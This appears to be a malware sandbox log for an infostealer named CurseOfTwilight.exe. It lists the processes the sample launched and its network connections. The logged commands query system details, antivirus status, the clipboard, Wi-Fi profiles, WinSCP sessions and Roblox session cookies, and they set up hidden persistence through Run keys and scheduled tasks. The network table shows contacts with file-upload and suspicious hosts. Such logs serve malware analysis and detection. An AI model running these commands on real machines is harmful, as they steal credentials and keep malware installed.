C:\Windows\system32\tasklist.exe
tasklist
C:\Windows\system32\tasklist.exe
tasklist
C:\Windows\system32\tasklist.exe
tasklist
C:\Windows\system32\tasklist.exe
tasklist
C:\Windows\system32\tasklist.exe
tasklist
C:\Windows\system32\tasklist.exe
tasklist
C:\Windows\system32\tasklist.exe
tasklist
C:\Windows\system32\tasklist.exe
tasklist
C:\Windows\system32\tasklist.exe
tasklist
C:\Windows\system32\tasklist.exe
tasklist
C:\Windows\system32\tasklist.exe
tasklist
C:\Windows\system32\tasklist.exe
tasklist
C:\Windows\system32\tasklist.exe
tasklist
C:\Windows\system32\tasklist.exe
tasklist
C:\Windows\system32\tasklist.exe
tasklist
C:\Windows\system32\tasklist.exe
tasklist
C:\Windows\system32\tasklist.exe
tasklist
C:\Windows\system32\tasklist.exe
tasklist
C:\Windows\system32\tasklist.exe
tasklist
C:\Windows\system32\tasklist.exe
tasklist
C:\Windows\system32\tasklist.exe
tasklist
C:\Windows\system32\tasklist.exe
tasklist
C:\Windows\system32\tasklist.exe
tasklist
C:\Windows\system32\tasklist.exe
tasklist
C:\Windows\system32\tasklist.exe
tasklist
C:\Windows\system32\tasklist.exe
tasklist
C:\Windows\system32\tasklist.exe
tasklist
C:\Windows\system32\tasklist.exe
tasklist
C:\Windows\system32\tasklist.exe
tasklist
C:\Windows\system32\tasklist.exe
tasklist
C:\Windows\system32\tasklist.exe
tasklist
C:\Windows\system32\tasklist.exe
tasklist
C:\Windows\system32\tasklist.exe
tasklist
C:\Windows\system32\tasklist.exe
tasklist
C:\Windows\system32\tasklist.exe
tasklist
C:\Windows\system32\tasklist.exe
tasklist
C:\Windows\system32\tasklist.exe
tasklist
C:\Windows\system32\tasklist.exe
tasklist
C:\Windows\system32\tasklist.exe
tasklist
C:\Windows\system32\tasklist.exe
tasklist
C:\Windows\system32\tasklist.exe
tasklist
C:\Windows\system32\tasklist.exe
tasklist
C:\Windows\system32\tasklist.exe
tasklist
C:\Windows\system32\tasklist.exe
tasklist
C:\Windows\system32\tasklist.exe
tasklist
C:\Windows\system32\tasklist.exe
tasklist
C:\Windows\system32\tasklist.exe
tasklist
C:\Windows\system32\tasklist.exe
tasklist
C:\Windows\system32\tasklist.exe
tasklist
C:\Windows\system32\tasklist.exe
tasklist
C:\Windows\system32\tasklist.exe
tasklist
C:\Windows\system32\tasklist.exe
tasklist
C:\Windows\system32\tasklist.exe
tasklist
C:\Windows\System32\Wbem\WMIC.exe
wmic OS get caption, osarchitecture
C:\Windows\system32\tasklist.exe
tasklist
C:\Windows\system32\net.exe
net session
C:\Windows\system32\tasklist.exe
tasklist
C:\Windows\system32\tasklist.exe
tasklist
C:\Windows\system32\tasklist.exe
tasklist
C:\Windows\system32\tasklist.exe
tasklist
C:\Windows\system32\tasklist.exe
tasklist
C:\Windows\system32\tasklist.exe
tasklist
C:\Windows\system32\tasklist.exe
tasklist
C:\Windows\system32\tasklist.exe
tasklist
C:\Windows\system32\tasklist.exe
tasklist
C:\Windows\system32\tasklist.exe
tasklist
C:\Windows\system32\tasklist.exe
tasklist
C:\Windows\system32\tasklist.exe
tasklist
C:\Windows\system32\tasklist.exe
tasklist
C:\Windows\system32\tasklist.exe
tasklist
C:\Windows\system32\tasklist.exe
tasklist
C:\Windows\system32\tasklist.exe
tasklist
C:\Windows\system32\tasklist.exe
tasklist
C:\Windows\system32\tasklist.exe
tasklist
C:\Windows\system32\tasklist.exe
tasklist
C:\Windows\system32\tasklist.exe
tasklist
C:\Windows\system32\tasklist.exe
tasklist
C:\Windows\system32\tasklist.exe
tasklist
C:\Windows\system32\tasklist.exe
tasklist
C:\Windows\system32\tasklist.exe
tasklist
C:\Windows\system32\tasklist.exe
tasklist
C:\Windows\system32\more.com
more +1
C:\Windows\System32\Wbem\WMIC.exe
wmic csproduct get uuid
C:\Windows\system32\tasklist.exe
tasklist
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 session
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "wmic cpu get name | more +1"
C:\Windows\System32\Wbem\WMIC.exe
wmic cpu get name
C:\Windows\system32\more.com
more +1
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "wmic PATH Win32_VideoController get name | more +1"
C:\Windows\System32\Wbem\WMIC.exe
wmic PATH Win32_VideoController get name
C:\Windows\system32\more.com
more +1
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\SoftwareProtectionPlatform' -Name BackupProductKeyDefault"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\SoftwareProtectionPlatform' -Name BackupProductKeyDefault
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion' -Name ProductName"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion' -Name ProductName
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "tasklist"
C:\Windows\system32\tasklist.exe
tasklist
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "wmic process where processid=4840 get ExecutablePath"
C:\Windows\System32\Wbem\WMIC.exe
wmic process where processid=4840 get ExecutablePath
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall""
C:\Windows\system32\reg.exe
C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall""
C:\Windows\system32\reg.exe
C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\7-Zip""
C:\Windows\system32\reg.exe
C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\7-Zip"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\AddressBook""
C:\Windows\system32\reg.exe
C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\AddressBook"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Connection Manager""
C:\Windows\system32\reg.exe
C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Connection Manager"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\DirectDrawEx""
C:\Windows\system32\reg.exe
C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\DirectDrawEx"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\DXM_Runtime""
C:\Windows\system32\reg.exe
C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\DXM_Runtime"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Fontcore""
C:\Windows\system32\reg.exe
C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Fontcore"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\IE40""
C:\Windows\system32\reg.exe
C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\IE40"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\IE4Data""
C:\Windows\system32\reg.exe
C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\IE4Data"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\IE5BAKEX""
C:\Windows\system32\reg.exe
C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\IE5BAKEX"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\IEData""
C:\Windows\system32\reg.exe
C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\IEData"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\MobileOptionPack""
C:\Windows\system32\reg.exe
C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\MobileOptionPack"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Mozilla Firefox 105.0.3 (x64 en-US)""
C:\Windows\system32\reg.exe
C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Mozilla Firefox 105.0.3 (x64 en-US)"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\MozillaMaintenanceService""
C:\Windows\system32\reg.exe
C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\MozillaMaintenanceService"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\MPlayer2""
C:\Windows\system32\reg.exe
C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\MPlayer2"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\ProPlusRetail - en-us""
C:\Windows\system32\reg.exe
C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\ProPlusRetail - en-us"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\SchedulingAgent""
C:\Windows\system32\reg.exe
C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\SchedulingAgent"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\VLC media player""
C:\Windows\system32\reg.exe
C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\VLC media player"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\WIC""
C:\Windows\system32\reg.exe
C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\WIC"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}""
C:\Windows\system32\reg.exe
C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{37B8F9C7-03FB-3253-8781-2517C99D7C00}""
C:\Windows\system32\reg.exe
C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{37B8F9C7-03FB-3253-8781-2517C99D7C00}"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{5740BD44-B58D-321A-AFC0-6D3D4556DD6C}""
C:\Windows\system32\reg.exe
C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{5740BD44-B58D-321A-AFC0-6D3D4556DD6C}"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{5FCE6D76-F5DC-37AB-B2B8-22AB8CEDB1D4}""
C:\Windows\system32\reg.exe
C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{5FCE6D76-F5DC-37AB-B2B8-22AB8CEDB1D4}"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{64A3A4F4-B792-11D6-A78A-00B0D0180381}""
C:\Windows\system32\reg.exe
C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{64A3A4F4-B792-11D6-A78A-00B0D0180381}"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{662A0088-6FCD-45DD-9EA7-68674058AED5}""
C:\Windows\system32\reg.exe
C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{662A0088-6FCD-45DD-9EA7-68674058AED5}"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{6DB765A8-05AF-49A1-A71D-6F645EE3CE41}""
C:\Windows\system32\reg.exe
C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{6DB765A8-05AF-49A1-A71D-6F645EE3CE41}"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{77924AE4-039E-4CA4-87B4-2F64180381F0}""
C:\Windows\system32\reg.exe
C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{77924AE4-039E-4CA4-87B4-2F64180381F0}"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90160000-007E-0000-1000-0000000FF1CE}""
C:\Windows\system32\reg.exe
C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90160000-007E-0000-1000-0000000FF1CE}"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90160000-008C-0000-1000-0000000FF1CE}""
C:\Windows\system32\reg.exe
C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90160000-008C-0000-1000-0000000FF1CE}"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90160000-008C-0409-1000-0000000FF1CE}""
C:\Windows\system32\reg.exe
C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90160000-008C-0409-1000-0000000FF1CE}"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{CB0836EC-B072-368D-82B2-D3470BF95707}""
C:\Windows\system32\reg.exe
C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{CB0836EC-B072-368D-82B2-D3470BF95707}"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{CF2BEA3C-26EA-32F8-AA9B-331F7E34BA97}""
C:\Windows\system32\reg.exe
C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{CF2BEA3C-26EA-32F8-AA9B-331F7E34BA97}"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell -ExecutionPolicy Bypass -NoProfile -File "C:\Users\Admin\AppData\Local\Temp\kbuL5EmJfXIQ_tezmp.ps1""
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "cscript C:\Users\Admin\AppData\Roaming\RGyqVfeN3YcR.vbs"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell -command "function Get-AntiVirusProduct { [CmdletBinding()] param ( [parameter(ValueFromPipeline=$true, ValueFromPipelineByPropertyName=$true)] [Alias('name')] $computername=$env:computername ) $AntiVirusProducts = Get-WmiObject -Namespace "root\\SecurityCenter2" -Class AntiVirusProduct -ComputerName $computername $ret = @() foreach ($AntiVirusProduct in $AntiVirusProducts) { switch ($AntiVirusProduct.productState) { "262144" { $defstatus = "Up to date"; $rtstatus = "Disabled" } "262160" { $defstatus = "Out of date"; $rtstatus = "Disabled" } "266240" { $defstatus = "Up to date"; $rtstatus = "Enabled" } "266256" { $defstatus = "Out of date"; $rtstatus = "Enabled" } "393216" { $defstatus = "Up to date"; $rtstatus = "Disabled" } "393232" { $defstatus = "Out of date"; $rtstatus = "Disabled" } "393488" { $defstatus = "Out of date"; $rtstatus = "Disabled" } "397312" { $defstatus = "Up to date"; $rtstatus = "Enabled" } "397328" { $defstatus = "Out of date"; $rtstatus = "Enabled" } "397584" { $defstatus = "Out of date"; $rtstatus = "Enabled" } default { $defstatus = "Unknown"; $rtstatus = "Unknown" } } $ht = @{} $ht.Computername = $computername $ht.Name = $AntiVirusProduct.displayName $ht.'Product GUID' = $AntiVirusProduct.instanceGuid $ht.'Product Executable' = $AntiVirusProduct.pathToSignedProductExe $ht.'Reporting Exe' = $AntiVirusProduct.pathToSignedReportingExe $ht.'Definition Status' = $defstatus $ht.'Real-time Protection Status' = $rtstatus # Créez un nouvel objet pour chaque ordinateur $ret += New-Object -TypeName PSObject -Property $ht } Return $ret } Get-AntiVirusProduct ""
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "netsh wlan show profile"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKCU\SOFTWARE\Martin Prikryl\WinSCP 2\Sessions""
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -ExecutionPolicy Bypass -NoProfile -File "C:\Users\Admin\AppData\Local\Temp\kbuL5EmJfXIQ_tezmp.ps1"
C:\Windows\system32\cscript.exe
cscript C:\Users\Admin\AppData\Roaming\RGyqVfeN3YcR.vbs
C:\Windows\system32\reg.exe
C:\Windows\system32\reg.exe QUERY "HKCU\SOFTWARE\Martin Prikryl\WinSCP 2\Sessions"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
C:\Windows\system32\netsh.exe
netsh wlan show profile
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -command "function Get-AntiVirusProduct {
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\\Roblox\\RobloxStudioBrowser\\roblox.com -Name .ROBLOSECURITY"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\\Roblox\\RobloxStudioBrowser\\roblox.com -Name .ROBLOSECURITY
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\\Roblox\\RobloxStudioBrowser\\roblox.com -Name .ROBLOSECURITY"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\\Roblox\\RobloxStudioBrowser\\roblox.com -Name .ROBLOSECURITY
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v WindowsDriverSetupP0HaCU /t REG_SZ /d C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Themes\CachedFiles\CurseOfTwilight.exe /f"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "cmd /c schtasks /create /sc onlogon /tn WindowsDriverSetupP0HaCU /tr \"C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Themes\CachedFiles\CurseOfTwilight.exe\" /F /rl highest"
C:\Windows\system32\cmd.exe
cmd /c schtasks /create /sc onlogon /tn WindowsDriverSetupP0HaCU /tr \"C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Themes\CachedFiles\CurseOfTwilight.exe\" /F /rl highest
C:\Windows\system32\reg.exe
C:\Windows\system32\reg.exe ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v WindowsDriverSetupP0HaCU /t REG_SZ /d C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Themes\CachedFiles\CurseOfTwilight.exe /f
C:\Windows\system32\schtasks.exe
schtasks /create /sc onlogon /tn WindowsDriverSetupP0HaCU /tr \"C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Themes\CachedFiles\CurseOfTwilight.exe\" /F /rl highest
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell -Command "attrib +h +s \"C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Themes\CachedFiles\CurseOfTwilight.exe\"""
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command "attrib +h +s \"C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Themes\CachedFiles\CurseOfTwilight.exe\""
C:\Windows\system32\attrib.exe
"C:\Windows\system32\attrib.exe" +h +s C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Themes\CachedFiles\CurseOfTwilight.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell -command " $Action = New-ScheduledTaskAction -Execute 'C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Templates\CurseOfTwilight.exe' $Trigger = New-ScheduledTaskTrigger -Daily -At '12:00PM' Register-ScheduledTask -Action $Action -Trigger $Trigger -TaskName StartCacaTask ""
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -command "
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "tasklist"
C:\Windows\system32\tasklist.exe
tasklist
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v Start_P0HaCU /t REG_SZ /d C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Libraries\sysWin10Boot_P0HaCU.vbs /f"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell -Command "attrib +h +s \"C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Libraries\sysWin10Boot_P0HaCU.vbs\"""
C:\Windows\system32\reg.exe
C:\Windows\system32\reg.exe ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v Start_P0HaCU /t REG_SZ /d C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Libraries\sysWin10Boot_P0HaCU.vbs /f
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command "attrib +h +s \"C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Libraries\sysWin10Boot_P0HaCU.vbs\""
C:\Windows\system32\attrib.exe
"C:\Windows\system32\attrib.exe" +h +s C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Libraries\sysWin10Boot_P0HaCU.vbs
C:\Users\Admin\AppData\Local\Temp\CurseOfTwilight.exe
"C:\Users\Admin\AppData\Local\Temp\CurseOfTwilight.exe" --type=gpu-process --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.15063.0 --user-data-dir="C:\Users\Admin\AppData\Roaming\script" --gpu-preferences=WAAAAAAAAADoAAAMAAAAAAAAAAAAAAAAAABgAAAAAAA4AAAAAAAAAAAAAABEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --mojo-platform-channel-handle=2628 --field-trial-handle=1652,i,10145686144927012465,2029700584885424378,262144 --disable-features=SpareRendererForSitePerProcess,WinDelaySpellcheckServiceInit,WinRetrieveSuggestionsOnlyOnDemand /prefetch:2
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | www.google.com | udp |
| GB | 172.217.16.228:80 | www.google.com | tcp |
| GB | 172.217.16.228:80 | www.google.com | tcp |
| US | 8.8.8.8:53 | www.facebook.com | udp |
| GB | 163.70.151.35:443 | www.facebook.com | tcp |
| US | 8.8.8.8:53 | 228.16.217.172.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 35.151.70.163.in-addr.arpa | udp |
| US | 8.8.8.8:53 | dns.google | udp |
| US | 8.8.8.8:53 | dns.google | udp |
| US | 8.8.4.4:443 | dns.google | tcp |
| US | 8.8.8.8:53 | 4.4.8.8.in-addr.arpa | udp |
| US | 8.8.8.8:53 | ipinfo.io | udp |
| US | 34.117.186.192:443 | ipinfo.io | tcp |
| US | 8.8.8.8:53 | 192.186.117.34.in-addr.arpa | udp |
| US | 8.8.8.8:53 | nova-sentinel.com | udp |
| GB | 89.213.140.116:443 | nova-sentinel.com | tcp |
| US | 8.8.8.8:53 | api.gofile.io | udp |
| FR | 51.178.66.33:443 | api.gofile.io | tcp |
| US | 8.8.8.8:53 | 116.140.213.89.in-addr.arpa | udp |
| US | 8.8.8.8:53 | store3.gofile.io | udp |
| US | 136.175.10.233:443 | store3.gofile.io | tcp |
| US | 8.8.8.8:53 | 33.66.178.51.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 233.10.175.136.in-addr.arpa | udp |
| US | 8.8.8.8:53 | hawkish.fr | udp |
| US | 8.8.8.8:53 | raw.githubusercontent.com | udp |
| US | 8.8.8.8:53 | github.com | udp |
| US | 185.199.111.133:443 | raw.githubusercontent.com | tcp |
| GB | 89.213.140.115:443 | hawkish.fr | tcp |
| US | 185.199.111.133:443 | raw.githubusercontent.com | tcp |
| GB | 89.213.140.115:443 | hawkish.fr | tcp |
| DE | 140.82.121.3:443 | github.com | tcp |
| GB | 89.213.140.115:443 | hawkish.fr | tcp |
| US | 8.8.8.8:53 | 133.111.199.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 115.140.213.89.in-addr.arpa | udp |
